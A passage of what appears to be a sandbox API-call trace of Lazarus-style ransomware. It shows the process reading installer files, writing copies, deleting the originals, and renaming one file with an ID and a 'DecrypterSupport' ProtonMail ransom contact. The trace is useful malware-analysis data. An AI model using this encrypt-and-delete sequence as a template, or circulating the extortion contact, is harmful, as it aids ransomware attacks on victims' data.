lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.292] GetLastError () returned 0x0 [0066.292] SetLastError (dwErrCode=0x0) [0066.292] GetLastError () returned 0x0 [0066.292] SetLastError (dwErrCode=0x0) [0066.292] GetLastError () returned 0x0 [0066.292] SetLastError (dwErrCode=0x0) [0066.292] GetLastError () returned 0x0 [0066.292] SetLastError (dwErrCode=0x0) [0066.292] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.293] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.293] GetLastError () returned 0x0 [0066.293] SetLastError (dwErrCode=0x0) [0066.293] GetLastError () returned 0x0 [0066.293] SetLastError (dwErrCode=0x0) [0066.293] GetLastError () returned 0x0 [0066.293] SetLastError (dwErrCode=0x0) [0066.293] GetLastError () returned 0x0 [0066.293] SetLastError (dwErrCode=0x0) [0066.293] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.293] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.294] GetLastError () returned 0x0 [0066.294] SetLastError (dwErrCode=0x0) [0066.294] GetLastError () returned 0x0 [0066.294] SetLastError (dwErrCode=0x0) [0066.294] GetLastError () returned 0x0 [0066.294] SetLastError (dwErrCode=0x0) [0066.294] GetLastError () returned 0x0 [0066.294] SetLastError (dwErrCode=0x0) [0066.294] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0xcde, lpOverlapped=0x0) returned 1 [0066.294] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.295] GetLastError () returned 0x0 [0066.295] SetLastError (dwErrCode=0x0) [0066.295] GetLastError () returned 0x0 [0066.295] SetLastError (dwErrCode=0x0) [0066.295] GetLastError () returned 0x0 [0066.295] SetLastError (dwErrCode=0x0) [0066.295] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.295] GetLastError () returned 0x0 [0066.295] SetLastError (dwErrCode=0x0) [0066.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d588 [0066.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0066.295] GetLastError () returned 0x0 [0066.295] SetLastError (dwErrCode=0x0) [0066.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0066.295] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xce0, lpOverlapped=0x0) returned 1 [0066.296] GetLastError () returned 0x0 [0066.296] SetLastError (dwErrCode=0x0) [0066.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0066.296] GetLastError () returned 0x0 [0066.296] SetLastError (dwErrCode=0x0) [0066.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0066.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0066.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0066.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.348] CloseHandle (hObject=0x420) returned 1 [0066.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0066.351] CloseHandle (hObject=0x428) returned 1 [0066.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0066.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0066.352] AreFileApisANSI () returned 1 [0066.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0066.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 45 [0066.352] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.353] GetFileType (hFile=0x428) returned 0x1 [0066.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0066.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0066.353] GetLastError () returned 0xb7 [0066.353] SetLastError (dwErrCode=0xb7) [0066.354] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.354] CloseHandle (hObject=0x428) returned 1 [0066.355] AreFileApisANSI () returned 1 [0066.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0066.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 45 [0066.355] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml")) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0066.356] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.356] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.356] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0066.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0066.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0066.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0066.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0066.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0066.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0066.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0066.357] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.357] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.357] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.357] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0066.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.357] AreFileApisANSI () returned 1 [0066.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.357] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.357] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0066.357] AreFileApisANSI () returned 1 [0066.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0066.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 46 [0066.358] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.358] GetFileType (hFile=0x428) returned 0x1 [0066.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0066.358] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0066.358] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0066.358] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0066.358] CloseHandle (hObject=0x428) returned 1 [0066.359] AreFileApisANSI () returned 1 [0066.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0066.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 46 [0066.359] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.359] GetFileType (hFile=0x428) returned 0x1 [0066.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0066.359] CloseHandle (hObject=0x428) returned 1 [0066.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0066.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0066.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0066.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0066.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0066.360] AreFileApisANSI () returned 1 [0066.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0066.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 46 [0066.360] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.360] AreFileApisANSI () returned 1 [0066.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.360] GetLastError () returned 0x0 [0066.360] SetLastError (dwErrCode=0x0) [0066.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0066.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0066.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0066.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0066.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0066.361] GetLastError () returned 0x0 [0066.361] SetLastError (dwErrCode=0x0) [0066.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0066.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71688 [0066.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0066.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0066.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0066.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0066.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0066.361] AreFileApisANSI () returned 1 [0066.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0066.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0066.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0066.361] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.361] GetFileType (hFile=0x428) returned 0x1 [0066.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0066.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0066.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0066.362] AreFileApisANSI () returned 1 [0066.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x716f0 [0066.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 46 [0066.362] 